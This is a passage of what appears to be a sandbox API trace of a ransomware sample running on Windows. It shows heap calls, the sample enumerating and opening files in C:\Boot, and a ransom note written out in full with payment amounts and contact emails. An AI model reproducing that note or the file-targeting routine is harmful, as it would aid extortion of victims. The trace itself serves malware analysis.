dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.453] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.453] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.454] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0178.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f68 | out: hHeap=0x6a0000) returned 1 [0178.454] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.454] PathFindFileNameW (pszPath="") returned="" [0178.454] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.454] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.454] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d165c0 [0178.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f68 | out: hHeap=0x6a0000) returned 1 [0178.455] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d165c0 [0178.455] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0178.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.456] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0178.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0178.456] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0178.456] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0178.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0178.456] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0178.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0178.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.458] FindFirstFileW (in: lpFileName="C:\\Boot\\*" (normalized: "c:\\boot\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0178.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.458] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.458] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xac81ba20, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xac81ba20, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0178.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.459] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0178.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.459] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x8f190550, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0178.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.459] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0178.459] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.459] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0178.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.460] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0178.460] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.460] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9578e980, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9578e980, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9578e980, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0178.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.460] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0178.460] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.461] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x9571c560, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.461] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0178.461] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.461] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27950 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279a0 [0178.461] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x38) returned 0x2cbfa50 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bd0 [0178.461] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9bd8 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279a0 [0178.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bf8 [0178.461] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bd0 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c20 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.462] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bf8 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279a0 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c70 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c98 [0178.462] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.462] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc) returned 0x2c70bc8 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c20 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bd0 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27cc0 [0178.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0178.463] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27950 [0178.463] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, 